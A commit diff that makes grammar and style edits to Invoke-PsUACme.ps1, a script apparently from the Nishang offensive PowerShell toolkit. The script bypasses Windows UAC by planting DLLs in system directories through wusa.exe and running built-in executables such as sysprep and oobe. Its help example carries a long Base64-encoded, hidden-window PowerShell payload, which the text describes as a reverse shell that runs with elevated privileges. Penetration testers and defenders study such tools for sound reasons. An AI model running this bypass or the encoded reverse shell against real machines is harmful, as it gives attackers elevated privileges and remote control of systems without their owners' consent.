Grammar and style improvements.

Escalation/Invoke-PsUACme.ps1

@@ -5,25 +5,25 @@
 Nishang script which uses known methods to bypass UAC.
 
 .DESCRIPTION
-This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
+This script implements methods from the UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
 It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables 
-to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue",
-"migwiz","cliconfg","winsat" and "mmc"
+to bypass UAC. The following methods (named mostly after the executables) are implemented: "sysprep", "oobe", "ActionQueue", 
+"migwiz", "cliconfg", "winsat" and "mmc".
 
-The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines.
-It is able to determine the bit-ness of the process from which it is called and uses the apt DLL.
+The DLLs dropped by the script are a modified version of Fubuki from the UACME project. The script needs separate DLLs for 64-bit and 32-bit machines.
+It is able to determine the architecture of the process from which it is called and use the appropriate DLL.
 
-The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
+The script drops cmd.bat in the C:\Windows\Temp directory, and it is this batch file which is called from the DLL. Everything provided
 to the Payload parameter ends up in this batch file.
 
-Wusa.exe on Windows 10  has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
-A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
+Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme currently does not work on Windows 10.
+A clean up is done by the script after payload execution, but the DLLs dropped in secure locations must be removed manually.
 The script must be run from a process running with medium integrity.
 
 .PARAMETER Payload
 Payload to be executed from the elevated process. Default one checks of the elevation was successful.
 
-.PARAMETER method
+.PARAMETER Method
 The method to be used for elevation. Defaut one is sysprep.
 
 .PARAMETER PayloadPath
@@ -46,16 +46,16 @@ PS > Invoke-PsUACme -Verbose
 Above command runs the sysprep method and the default payload.
 
 .EXAMPLE
-PS > Invoke-PsUACme -method oobe -Verbose
+PS > Invoke-PsUACme -Method oobe -Verbose
 Above command runs the oobe method and the default payload.
 
 .EXAMPLE
-PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
+PS > Invoke-PsUACme -Method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
 Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
-(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the 
+from the Shells directory of Nishang, which is Base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the 
 Utility directory of Nishang.
 
-The reverse shell in above case runs with elevated privileges.
+The reverse shell in the above case runs with elevated privileges.
 
 .LINK
 http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
@@ -72,7 +72,7 @@ https://github.com/samratashok/nishang
         [Parameter(Position = 1, Mandatory = $False)]
         [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
         [String]
-        $method = "sysprep",
+        $Method = "sysprep",
 
         [Parameter(Position = 2, Mandatory = $False)]
         [String]
@@ -100,36 +100,36 @@ https://github.com/samratashok/nishang
 
     if ($CustomDll64)
     {
-        Write-Verbose "Reading 64 bit DLL."
+        Write-Verbose "Reading 64-bit DLL."
         [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
         $DllBytes64 = $bytes -join ' '
     }
     elseif ($CustomDll32)
     {
-        Write-Verbose "Reading 32 bit DLL."
+        Write-Verbose "Reading 32-bit DLL."
         [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
         $DllBytes32 = $bytes -join ' '
     }
 
     if (([IntPtr]::Size) -eq 8)
     {
-        Write-Verbose "64 bit process detected."
+        Write-Verbose "64-bit process detected."
         $DllBytes = $DllBytes64
     }
     elseif (([IntPtr]::Size) -eq 4)
     {
-        Write-Verbose "32 bit process detected."
+        Write-Verbose "32-bit process detected."
         $DllBytes = $DllBytes32
     }
 
     Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
     $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
-    switch($method)
+    switch($Method)
     {
 
         "Sysprep"
         {
-            Write-Output "Using Sysprep method"
+            Write-Output "Using Sysprep method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -152,7 +152,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\Sysprep\"
@@ -168,7 +168,7 @@ https://github.com/samratashok/nishang
 
         "OOBE"
         {
-            Write-Output "Using OOBE method"
+            Write-Output "Using OOBE method."
             Write-Verbose "Writing DLLs to Temp directory"
             if ($OSVersion -match "76")
             {
@@ -192,7 +192,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\oobe\"
@@ -208,7 +208,7 @@ https://github.com/samratashok/nishang
 
         "ActionQueue"
         {
-            Write-Output "Using Sysprep Actionqueue method"
+            Write-Output "Using Sysprep Actionqueue method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -221,12 +221,12 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "96")
             {
-                Write-Warning "This method doesn't work Windows 8.1 onwards."
+                Write-Warning "This method does not work beyond Windows 8.1."
             }
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\Sysprep\"
@@ -242,7 +242,7 @@ https://github.com/samratashok/nishang
 
         "migwiz"
         {
-            Write-Output "Using migwiz method"
+            Write-Output "Using migwiz method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -265,7 +265,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\migwiz\"
@@ -281,7 +281,7 @@ https://github.com/samratashok/nishang
 
         "cliconfg"
         {
-            Write-Output "Using cliconfg method"
+            Write-Output "Using cliconfg method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -304,7 +304,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\"
@@ -320,7 +320,7 @@ https://github.com/samratashok/nishang
 
        "winsat"
         {
-            Write-Output "Using winsat method"
+            Write-Output "Using winsat method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -343,7 +343,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\sysprep\"
@@ -366,7 +366,7 @@ https://github.com/samratashok/nishang
 
         "mmc"
         {
-            Write-Output "Using mmc method"
+            Write-Output "Using mmc method."
             if ($OSVersion -match "76")
             {
                 Write-Verbose "Windows 7 found!"
@@ -389,7 +389,7 @@ https://github.com/samratashok/nishang
 
             if ($OSVersion -match "10")
             {
-                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
+                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*."
             }
             $Target = "$env:temp\uac.cab"
             $wusapath = "C:\Windows\System32\"
@@ -404,12 +404,12 @@ https://github.com/samratashok/nishang
         }
     }
 
-    #Clean up
+    # Clean up
     Write-Verbose "Removing $Target."
     Remove-Item -Path $Target
     Write-Verbose "Removing $PathToDll."
     Remove-Item -Path $PathToDll
     Write-Verbose "$wusapath$dllname must be removed manually."
     Write-Verbose "$PayloadPath must be removed manually."
 
-}
+}